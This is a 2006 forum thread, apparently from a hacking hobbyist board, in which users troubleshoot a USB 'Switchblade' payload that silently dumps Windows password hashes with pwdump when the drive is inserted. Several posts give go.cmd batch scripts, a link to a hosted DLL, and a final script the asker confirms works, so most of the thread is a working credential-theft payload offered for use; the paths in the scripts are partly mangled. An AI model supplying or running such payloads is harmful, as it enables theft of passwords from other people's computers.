Snacks Posted November 14, 2006 Posted November 14, 2006 Hi I'm pretty new to the forums and to U3 shenanigans so apologies if this is an overly obvious question. Basically I want my Switchblade to just grab the LM hashes from the computer using pwdump. I've been using the examples in the Switchblade packages page on the wiki, but without success. Oh and I believe I have flashed the drive correctly using MaxDamage's Technique, as other payloads worked. I was hoping someone could point me in the direction of the correct code for the go.cmd, and any other files I will need to grab the hashes. Thanks for your time. Quote
renegadecanuck Posted November 14, 2006 Posted November 14, 2006 Hey, Snascks, could you be more specific please? Such as, what error messages are you getting, what is the current coding structure of your go.cmd, which payload are you using, etc. Quote
Snacks Posted November 14, 2006 Author Posted November 14, 2006 Sorry, here is a rundown of what I'm using; U3 Sandisk Cruzer micro Max Damage Technique brainkills encrypted pwdump Here is what I have for my go.cmd; @echo off if not exist WIPdump md WIPdump >nul if not exist WIPdump%computername% md WIPdump%computername% >nul cd WIPCMD >nul Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 Echo ***********[Dump SAM]*************** >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .pwdump 127.0.0.1 >> Documentslogfiles%computername%.log 2>&1 Quote
Jester Posted November 14, 2006 Posted November 14, 2006 I am going to assume that you are getting the same error msg that I was getting because you still have not explained what the error msg was. There is a missing dll file from the downloads page here is a link to one that I have hosted place in your directory with your pwdump.exe file http://binaryninja.net/LsaExt.dll Test that out if it helps let me know otherwise give some details on the error msg thanks. :) 8) Quote
renegadecanuck Posted November 14, 2006 Posted November 14, 2006 While, it will be detectable to AV's, try using the newest version on PWDump. Quote
Snacks Posted November 14, 2006 Author Posted November 14, 2006 Thanks for the replies, I am going to assume that you are getting the same error msg that I was getting because you still have not explained what the error msg was. There is a missing dll file from the downloads page here is a link to one that I have hosted place in your directory with your pwdump.exe file http://binaryninja.net/LsaExt.dll Test that out if it helps let me know otherwise give some details on the error msg thanks. :) 8) I tried the .dll and had the same problem as before, basically when i insert the drive all that seems to happen is the WIPdumpcomputername folder is made but there are no files in it. While, it will be detectable to AV's, try using the newest version on PWDump. I tried that and got the same problem. Quote
renegadecanuck Posted November 14, 2006 Posted November 14, 2006 Change if not exist WIPdump%computername% md WIPdump%computername% >nulcd WIPCMD >nul Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 Echo ***********[Dump SAM]*************** >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .pwdump 127.0.0.1 >> Documentslogfiles%computername%.log 2>&1 to if not exist WIPdump%computername.log% md WIPdump%computername%.log >nulcd WIPCMD >nul Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 Echo ***********[Dump SAM]*************** >> Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> Documentslogfiles%computername%.log 2>&1 .pwdump 127.0.0.1 >> Documentslogfiles%computername%.log 2>&1 Quote
Snacks Posted November 14, 2006 Author Posted November 14, 2006 Thankyou, I didnt have any luck even after all your help, not sure what the problem was, but i decided to start from scratch and made my own simplified version of 'go.cmd'. For anyone interested i just used the following lines; @echo off pwdump -o %computername%.txt 127.0.0.1 That just dumps the passwords in CMD. Quote
Jester Posted November 15, 2006 Posted November 15, 2006 @echo off if not exist WIPdump md WIPdump >nul if not exist WIPdump%computername% md WIPdump%computername% >nul cd WIPCMD >nul Echo ************************************ >> WIPdump%computername%.log 2>&1 echo ***********[Dump SAM]*************** >> WIPdump%computername%.log 2>&1 Echo ************************************ >> WIPdump%computername%.log 2>&1 .pwdump 127.0.0.1 >> WIPdump%computername%.log 2>&1 Here is the correct code you need to have you had the output going into the wrong directory. Quote
Snacks Posted November 15, 2006 Author Posted November 15, 2006 :oops: Thanks Jester! Working perfectly now. :D Quote
mubix Posted November 15, 2006 Posted November 15, 2006 Where can one find updated code at.. I am probably buying a U3 device tonight Quote
Jester Posted November 15, 2006 Posted November 15, 2006 You can check out the wiki http://www.hak5.org/wiki/Switchblade_Packages Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.